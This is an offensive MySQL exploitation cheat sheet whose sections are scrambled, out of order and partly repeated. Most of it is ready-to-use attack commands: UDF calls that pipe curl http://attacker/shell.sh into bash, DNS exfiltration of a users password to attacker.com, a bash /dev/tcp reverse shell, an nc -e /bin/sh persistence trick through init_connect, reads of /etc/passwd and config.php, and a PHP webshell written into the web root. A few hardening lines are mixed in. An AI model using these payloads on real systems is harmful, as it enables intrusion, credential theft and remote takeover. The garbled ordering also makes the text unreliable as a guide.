# Malicious server that reads client files python mysql_file_read_server.py Victim connects: mysql -h attacker.com -u root -p → You steal /etc/passwd Try: mysql --enable-local-infile -h target -u user -p 7. Post-Exploitation: OS Shell via MySQL If you can run OS commands (UDF or SQLi with file write):
SELECT * FROM mysql.func WHERE name = 'sys_exec'; SELECT sys_eval('curl http://attacker/shell.sh | bash'); 📡 DNS Exfiltration (No direct internet) SELECT LOAD_FILE(CONCAT('\\\\', (SELECT password FROM users LIMIT 1), '.attacker.com\\fake')); (MySQL will try to resolve the UNC path – leaks data via DNS) 🐍 MySQL to Shell via into outfile + Cron -- Write a reverse shell script SELECT "#!/bin/bash\nbash -i >& /dev/tcp/10.0.0.1/4444 0>&1" INTO OUTFILE "/tmp/rev.sh"; -- Then via OS command execution (UDF or other method) SELECT sys_exec('chmod +x /tmp/rev.sh && /tmp/rev.sh'); 🔁 Abusing init_connect for Persistence SET GLOBAL init_connect = "INSERT INTO mysql.access_log VALUES (current_user(), now());"; -- But better for privesc: add malicious command SET GLOBAL init_connect = "SET @malicious = 'sys_exec(\"nc -e /bin/sh attacker 4444\")';"; 5. Dangerous MySQL Settings to Exploit | Variable | Dangerous Value | Impact | |----------|----------------|--------| | secure_file_priv | "" (empty) | Read/write any file | | local_infile | ON | Client-side file read attack | | log_bin_trust_function_creators | ON | Create dangerous UDFs | | plugin_dir | Writable by mysql user | Upload UDFs | | validate_password | OFF | Weak passwords allowed |
-- Check for dangerous functions SELECT * FROM mysql.func; -- user-defined functions (UDF) 👑 UDF (User Defined Functions) – SYSTEM shell If secure_file_priv allows writes to plugin dir: mysql hacktricks
-- Remove dangerous UDFs DROP FUNCTION IF EXISTS sys_exec; DROP FUNCTION IF EXISTS sys_eval;
-- Version & OS SELECT version(); SELECT @@version_comment; SELECT @@hostname; -- Current user & privileges SELECT user(); SELECT current_user(); SELECT grantee, privilege_type FROM information_schema.user_privileges; # Malicious server that reads client files python
-- Find writable directories SHOW VARIABLES LIKE 'secure_file_priv'; -- NULL = no file ops, "" = any dir SHOW VARIABLES LIKE 'datadir'; SHOW VARIABLES LIKE 'plugin_dir';
-- All databases SELECT schema_name FROM information_schema.schemata; SELECT sys_eval('curl http://attacker/shell.sh | bash')
-- Disable local_infile SET GLOBAL local_infile = 0;
-- Read sensitive files SELECT LOAD_FILE('/etc/passwd'); SELECT LOAD_FILE('/var/www/html/config.php'); -- Write webshell (needs secure_file_priv = "") SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php"; Once logged in, gather intel: